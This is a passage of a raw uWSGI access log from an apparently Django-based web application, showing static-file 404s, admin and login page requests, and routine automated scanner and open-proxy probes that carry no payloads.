[Sat Jan 9 01:55:55 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 555/792] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 556/793] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:55 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 557/794] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:55 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 558/795] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 559/796] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 560/797] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 561/798] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 562/799] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:55 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 563/800] 219.228.146.62 () {40 vars in 927 bytes} [Sat Jan 9 01:55:57 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 564/801] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:55:57 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 565/802] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 566/803] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 567/804] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 568/805] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 569/806] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 570/807] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:58 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 571/808] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 572/809] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:58 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 573/810] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:58 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 574/811] 219.228.146.62 () {40 vars in 930 bytes} [Sat Jan 9 01:55:59 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 575/812] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 576/813] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 577/814] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 578/815] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 579/816] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 580/817] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:59 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 581/818] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 582/819] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 583/820] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:59 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 584/821] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:56:00 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 585/822] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 586/823] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 587/824] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 588/825] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 589/826] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 590/827] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 591/828] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:56:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 592/829] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:56:01 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 593/830] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:56:01 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 594/831] 219.228.146.62 () {40 vars in 910 bytes} [Sat Jan 9 01:56:12 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 595/832] 219.228.146.62 () {40 vars in 911 bytes} [Sat Jan 9 01:56:22 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 596/833] 219.228.146.62 () {40 vars in 913 bytes} [Sat Jan 9 01:56:22 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 597/834] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:29 2021] POST /login/ => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 598/835] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:39 2021] POST /login/ => generated 82 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 599/836] 219.228.146.62 () {48 vars in 1002 bytes} [Sat Jan 9 01:56:46 2021] POST /login/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 600/837] 219.228.146.62 () {40 vars in 906 bytes} [Sat Jan 9 01:56:46 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 601/838] 219.228.146.62 () {40 vars in 908 bytes} [Sat Jan 9 01:56:46 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 602/839] 219.228.146.62 () {40 vars in 910 bytes} [Sat Jan 9 01:56:51 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 603/840] 219.228.146.62 () {40 vars in 911 bytes} [Sat Jan 9 01:56:51 2021] GET /publish/ => generated 5083 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/841] 219.228.146.62 () {38 vars in 853 bytes} [Sat Jan 9 01:56:52 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 604/842] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 02:13:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 605/843] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 02:51:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 606/844] 117.100.100.38 () {40 vars in 1026 bytes} [Sat Jan 9 03:13:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/845] 117.100.100.38 () {40 vars in 981 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/846] 117.100.100.38 () {40 vars in 959 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/847] 117.100.100.38 () {40 vars in 963 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/848] 117.100.100.38 () {40 vars in 961 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/849] 117.100.100.38 () {40 vars in 967 bytes} [Sat Jan 9 03:13:37 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/850] 117.100.100.38 () {40 vars in 942 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/851] 117.100.100.38 () {40 vars in 958 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/852] 117.100.100.38 () {40 vars in 940 bytes} [Sat Jan 9 03:13:37 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/853] 117.100.100.38 () {40 vars in 956 bytes} [Sat Jan 9 03:13:38 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/854] 117.100.100.38 () {40 vars in 948 bytes} [Sat Jan 9 03:13:38 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/855] 117.100.100.38 () {40 vars in 1052 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/856] 117.100.100.38 () {40 vars in 1058 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/857] 117.100.100.38 () {40 vars in 1020 bytes} [Sat Jan 9 03:13:40 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 607/858] 117.100.100.38 () {42 vars in 1084 bytes} [Sat Jan 9 03:13:43 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 608/859] 117.100.100.38 () {42 vars in 1086 bytes} [Sat Jan 9 03:13:43 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 18965|app: 0|req: 609/860] 117.100.100.38 () {40 vars in 1007 bytes} [Sat Jan 9 03:13:44 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 610/861] 117.100.100.38 () {40 vars in 1044 bytes} [Sat Jan 9 03:13:45 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 611/862] 101.91.62.99 () {32 vars in 624 bytes} [Sat Jan 9 03:23:01 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 612/863] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 03:34:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 613/864] 92.246.216.16 () {28 vars in 403 bytes} [Sat Jan 9 03:45:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /boaform/admin/formLogin +[pid: 18965|app: 0|req: 614/865] 167.99.215.147 () {44 vars in 782 bytes} [Sat Jan 9 04:00:47 2021] POST /boaform/admin/formLogin => generated 3434 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 615/866] 124.23.134.78 () {22 vars in 225 bytes} [Sat Jan 9 04:01:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 616/867] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 04:17:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /http:/example.com/ +[pid: 18965|app: 0|req: 617/868] 64.31.8.10 () {28 vars in 347 bytes} [Sat Jan 9 04:29:45 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 59103] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 618/869] 64.31.8.10 () {26 vars in 337 bytes} [Sat Jan 9 04:29:45 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /http:/110.242.68.4/ +[pid: 18965|app: 0|req: 619/870] 111.175.57.7 () {40 vars in 725 bytes} [Sat Jan 9 04:33:11 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 620/871] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 04:59:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 621/872] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 05:39:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 622/873] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:18:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 623/874] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:18:55 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 624/875] 159.138.233.213 () {22 vars in 236 bytes} [Sat Jan 9 06:32:34 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 625/876] 159.138.233.213 () {24 vars in 302 bytes} [Sat Jan 9 06:32:34 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /http:/example.com/ +[pid: 18965|app: 0|req: 626/877] 64.31.8.10 () {28 vars in 347 bytes} [Sat Jan 9 06:33:25 2021] GET http://example.com/ => generated 1665 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 48858] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 627/878] 64.31.8.10 () {26 vars in 337 bytes} [Sat Jan 9 06:33:25 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 628/879] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 06:56:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 629/880] 83.97.20.34 () {26 vars in 277 bytes} [Sat Jan 9 07:25:27 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /TP/public/index.php +[pid: 18965|app: 0|req: 630/881] 123.207.222.213 () {30 vars in 450 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/public/index.php => generated 3421 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /TP/index.php +[pid: 18965|app: 0|req: 631/882] 123.207.222.213 () {30 vars in 437 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/index.php => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /thinkphp/html/public/index.php +[pid: 18965|app: 0|req: 632/883] 123.207.222.213 () {30 vars in 473 bytes} [Sat Jan 9 07:28:34 2021] GET /thinkphp/html/public/index.php => generated 3454 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /html/public/index.php +[pid: 18965|app: 0|req: 633/884] 123.207.222.213 () {30 vars in 455 bytes} [Sat Jan 9 07:28:34 2021] GET /html/public/index.php => generated 3427 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /public/index.php +[pid: 18965|app: 0|req: 634/885] 123.207.222.213 () {30 vars in 445 bytes} [Sat Jan 9 07:28:34 2021] GET /public/index.php => generated 3412 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /TP/html/public/index.php +[pid: 18965|app: 0|req: 635/886] 123.207.222.213 () {30 vars in 460 bytes} [Sat Jan 9 07:28:34 2021] GET /TP/html/public/index.php => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /elrekt.php +[pid: 18965|app: 0|req: 636/887] 123.207.222.213 () {30 vars in 433 bytes} [Sat Jan 9 07:28:34 2021] GET /elrekt.php => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /index.php +[pid: 18965|app: 0|req: 637/888] 123.207.222.213 () {30 vars in 431 bytes} [Sat Jan 9 07:28:34 2021] GET /index.php => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /users +[pid: 18965|app: 0|req: 638/889] 123.207.222.213 () {34 vars in 519 bytes} [Sat Jan 9 07:28:35 2021] POST /users?page=&size=5 => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 639/890] 123.207.222.213 () {30 vars in 413 bytes} [Sat Jan 9 07:28:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 640/891] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 07:36:12 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 641/892] 212.64.18.182 () {28 vars in 321 bytes} [Sat Jan 9 08:07:43 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 642/893] 83.97.20.21 () {26 vars in 277 bytes} [Sat Jan 9 08:14:29 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 643/894] 83.97.20.21 () {26 vars in 276 bytes} [Sat Jan 9 08:52:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 644/895] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 09:34:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 645/896] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 10:16:44 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 646/897] 49.234.4.227 () {22 vars in 233 bytes} [Sat 